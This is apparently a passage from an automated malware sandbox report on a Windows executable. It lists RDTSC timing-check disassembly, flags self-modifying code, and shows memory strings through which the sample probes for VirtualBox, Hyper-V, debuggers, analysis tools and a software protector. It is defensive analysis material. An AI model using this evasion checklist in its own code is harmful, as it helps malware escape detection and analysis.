Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D1311 second address: 71D1315 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D1315 second address: 71D1325 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+18h] 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D1325 second address: 71D132E instructions: 0x00000000 rdtsc 0x00000002 mov dl, 99h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D132E second address: 71D1383 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov esi, 16098F73h 0x00000009 popad 0x0000000a popad 0x0000000b mov dword ptr [edx+18h], eax 0x0000000e jmp 00007F953D46EDA6h 0x00000013 mov eax, dword ptr [esi+1Ch] 0x00000016 pushad 0x00000017 mov dx, ax 0x0000001a pushfd 0x0000001b jmp 00007F953D46ED9Ah 0x00000020 jmp 00007F953D46EDA5h 0x00000025 popfd 0x00000026 popad 0x00000027 mov dword ptr [edx+1Ch], eax 0x0000002a pushad 0x0000002b push eax 0x0000002c push edx 0x0000002d push esi 0x0000002e pop edi 0x0000002f rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D1383 second address: 71D13BB instructions: 0x00000000 rdtsc 0x00000002 mov si, D225h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dx, si 0x0000000b popad 0x0000000c mov eax, dword ptr [esi+20h] 0x0000000f pushad 0x00000010 mov esi, 0990EDD9h 0x00000015 mov eax, 30198E95h 0x0000001a popad 0x0000001b mov dword ptr [edx+20h], eax 0x0000001e pushad 0x0000001f push esi 0x00000020 mov ah, bh 0x00000022 pop ecx 0x00000023 mov si, dx 0x00000026 popad 0x00000027 mov eax, dword ptr [esi+24h] 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F953D01523Ch 0x00000031 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D13BB second address: 71D13C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, cx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D13C3 second address: 71D1414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [edx+24h], eax 0x0000000a jmp 00007F953D015246h 0x0000000f mov eax, dword ptr [esi+28h] 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 pushfd 0x00000018 jmp 00007F953D015243h 0x0000001d jmp 00007F953D015243h 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D1414 second address: 71D1471 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D46EDA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+28h], eax 0x0000000c jmp 00007F953D46ED9Eh 0x00000011 mov ecx, dword ptr [esi+2Ch] 0x00000014 jmp 00007F953D46EDA0h 0x00000019 mov dword ptr [edx+2Ch], ecx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F953D46EDA7h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D1471 second address: 71D1498 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D015249h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ax, word ptr [esi+30h] 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D1498 second address: 71D149E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D149E second address: 71D14D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D015242h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [edx+30h], ax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F953D015247h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D14D1 second address: 71D1506 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F953D46EDA2h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ax, word ptr [esi+32h] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F953D46EDA7h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D1506 second address: 71D150C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D150C second address: 71D1510 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D1510 second address: 71D1514 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D1514 second address: 71D152A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov word ptr [edx+32h], ax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f movzx esi, bx 0x00000012 movsx edx, ax 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D152A second address: 71D15D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D015247h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+34h] 0x0000000c pushad 0x0000000d mov di, ax 0x00000010 mov dx, ax 0x00000013 popad 0x00000014 mov dword ptr [edx+34h], eax 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F953D015248h 0x0000001e sbb ecx, 0DC246E8h 0x00000024 jmp 00007F953D01523Bh 0x00000029 popfd 0x0000002a mov ch, EEh 0x0000002c popad 0x0000002d test ecx, 00000700h 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 pushfd 0x00000037 jmp 00007F953D01523Ch 0x0000003c sub al, 00000048h 0x0000003f jmp 00007F953D01523Bh 0x00000044 popfd 0x00000045 pushfd 0x00000046 jmp 00007F953D015248h 0x0000004b add eax, 460D1BA8h 0x00000051 jmp 00007F953D01523Bh 0x00000056 popfd 0x00000057 popad 0x00000058 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D15D3 second address: 71D1646 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D46EDA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F95AD77CEBDh 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F953D46ED9Ch 0x00000016 add al, 00000038h 0x00000019 jmp 00007F953D46ED9Bh 0x0000001e popfd 0x0000001f mov esi, 724E536Fh 0x00000024 popad 0x00000025 or dword ptr [edx+38h], FFFFFFFFh 0x00000029 pushad 0x0000002a mov edi, esi 0x0000002c pushad 0x0000002d mov esi, 081BBAB9h 0x00000032 push ecx 0x00000033 pop edi 0x00000034 popad 0x00000035 popad 0x00000036 or dword ptr [edx+3Ch], FFFFFFFFh 0x0000003a pushad 0x0000003b mov bx, cx 0x0000003e mov edx, esi 0x00000040 popad 0x00000041 or dword ptr [edx+40h], FFFFFFFFh 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007F953D46ED9Bh 0x0000004c rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D1646 second address: 71D164C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D164C second address: 71D1675 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D46ED9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F953D46EDA5h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D1675 second address: 71D167E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 2222h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71D167E second address: 71D169A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F953D46EDA2h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 716002D second address: 716003D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F953D01523Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 716003D second address: 7160041 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 7160041 second address: 71600C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a call 00007F953D01523Ch 0x0000000f jmp 00007F953D015242h 0x00000014 pop ecx 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F953D015241h 0x0000001c jmp 00007F953D01523Bh 0x00000021 popfd 0x00000022 pushad 0x00000023 popad 0x00000024 popad 0x00000025 popad 0x00000026 xchg eax, ebp 0x00000027 pushad 0x00000028 push eax 0x00000029 call 00007F953D015241h 0x0000002e pop esi 0x0000002f pop ebx 0x00000030 movzx ecx, di 0x00000033 popad 0x00000034 mov ebp, esp 0x00000036 pushad 0x00000037 mov edx, 38FB65CAh 0x0000003c push ebx 0x0000003d pop edx 0x0000003e popad 0x0000003f pop ebp 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 mov bl, 09h 0x00000045 jmp 00007F953D01523Eh 0x0000004a popad 0x0000004b rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71600C7 second address: 71600CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71606F2 second address: 716070F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D015249h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 716070F second address: 7160715 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 7160715 second address: 7160719 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 7160719 second address: 7160752 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 jmp 00007F953D46EDA4h 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F953D46EDA7h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 7160752 second address: 7160757 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 7160757 second address: 716076A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov esi, ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov ah, bl 0x0000000e push eax 0x0000000f push edx 0x00000010 movzx eax, di 0x00000013 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 7160B78 second address: 7160B7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71B097A second address: 71B0998 instructions: 0x00000000 rdtsc 0x00000002 mov al, 1Dh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ebp, esp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F953D46EDA1h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71B0998 second address: 71B099E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71B099E second address: 71B09A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71B09A4 second address: 71B09A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71B09A8 second address: 71B09CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D46EDA6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71B09CB second address: 71B09D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 719004C second address: 71900A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F953D46EDA7h 0x00000009 and cx, E11Eh 0x0000000e jmp 00007F953D46EDA9h 0x00000013 popfd 0x00000014 mov ebx, ecx 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a jmp 00007F953D46ED9Dh 0x0000001f xchg eax, ebp 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F953D46ED9Dh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71900A9 second address: 7190165 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D015241h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c movzx ecx, bx 0x0000000f mov bh, 74h 0x00000011 popad 0x00000012 and esp, FFFFFFF0h 0x00000015 jmp 00007F953D015240h 0x0000001a sub esp, 44h 0x0000001d jmp 00007F953D015240h 0x00000022 xchg eax, ebx 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007F953D01523Eh 0x0000002a sbb ecx, 5FFF4E38h 0x00000030 jmp 00007F953D01523Bh 0x00000035 popfd 0x00000036 pushfd 0x00000037 jmp 00007F953D015248h 0x0000003c adc ax, 4898h 0x00000041 jmp 00007F953D01523Bh 0x00000046 popfd 0x00000047 popad 0x00000048 push eax 0x00000049 jmp 00007F953D015249h 0x0000004e xchg eax, ebx 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007F953D01523Dh 0x00000056 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 7190165 second address: 7190181 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D46EDA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 7190181 second address: 7190185 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 7190185 second address: 719018B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 719018B second address: 71901A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F953D015241h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71901A0 second address: 71901C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D46EDA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F953D46ED9Ch 0x00000013 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71901C6 second address: 71901DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D01523Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov bh, 9Dh 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71901DE second address: 7190234 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D46EDA3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007F953D46EDA6h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F953D46ED9Ch 0x00000019 xor eax, 5FBD6608h 0x0000001f jmp 00007F953D46ED9Bh 0x00000024 popfd 0x00000025 mov ax, 047Fh 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 7190234 second address: 7190254 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D015245h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 7190254 second address: 7190258 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 7190258 second address: 719025C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 719025C second address: 7190262 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 7190262 second address: 7190277 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F953D015241h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 7190277 second address: 719027B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 719027B second address: 71902BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edi, dword ptr [ebp+08h] 0x0000000b jmp 00007F953D01523Dh 0x00000010 mov dword ptr [esp+24h], 00000000h 0x00000018 jmp 00007F953D01523Eh 0x0000001d lock bts dword ptr [edi], 00000000h 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F953D01523Ah 0x0000002b rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71902BC second address: 71902C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71902C0 second address: 71902C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71902C6 second address: 71902CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71902CB second address: 719034C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movzx eax, bx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007F95AD4C7394h 0x00000010 jmp 00007F953D015245h 0x00000015 pop edi 0x00000016 jmp 00007F953D01523Eh 0x0000001b pop esi 0x0000001c pushad 0x0000001d mov cx, 7B3Dh 0x00000021 mov eax, 294E8E39h 0x00000026 popad 0x00000027 pop ebx 0x00000028 jmp 00007F953D015244h 0x0000002d mov esp, ebp 0x0000002f pushad 0x00000030 jmp 00007F953D01523Eh 0x00000035 mov cx, D651h 0x00000039 popad 0x0000003a pop ebp 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F953D015243h 0x00000042 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71C0150 second address: 71C0154 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: 71C0154 second address: 71C015A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\JbN2WYseAr.exeSpecial instruction interceptor: First address: B29BF2 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\JbN2WYseAr.exeSpecial instruction interceptor: First address: B29B4B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\JbN2WYseAr.exeSpecial instruction interceptor: First address: D04D92 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\JbN2WYseAr.exeSpecial instruction interceptor: First address: B29AFA instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\JbN2WYseAr.exeSpecial instruction interceptor: First address: B29B56 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\JbN2WYseAr.exeSpecial instruction interceptor: First address: D6D4F1 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_2_00609980 rdtsc 0_2_00609980
Source: C:\Users\user\Desktop\JbN2WYseAr.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_2_0042255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0042255D
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_2_004229FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_004229FF
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_2_0042255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0042255D
Source: JbN2WYseAr.exe, JbN2WYseAr.exe, 00000000.00000002.1441549149.0000000000CC0000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: JbN2WYseAr.exe, 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: JbN2WYseAr.exe, 00000000.00000003.1420522269.0000000001734000.00000004.00000020.00020000.00000000.sdmp, JbN2WYseAr.exe, 00000000.00000003.1420813062.0000000001740000.00000004.00000020.00020000.00000000.sdmp, JbN2WYseAr.exe, 00000000.00000003.1421104076.000000000174F000.00000004.00000020.00020000.00000000.sdmp, JbN2WYseAr.exe, 00000000.00000003.1420763217.0000000001739000.00000004.00000020.00020000.00000000.sdmp, JbN2WYseAr.exe, 00000000.00000002.1442632560.0000000001750000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllGf!
Source: JbN2WYseAr.exe, 00000000.00000003.1320891102.0000000006A51000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFlS?:G
Source: JbN2WYseAr.exeBinary or memory string: Hyper-V RAW
Source: JbN2WYseAr.exe, 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: JbN2WYseAr.exe, 00000000.00000002.1441549149.0000000000CC0000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
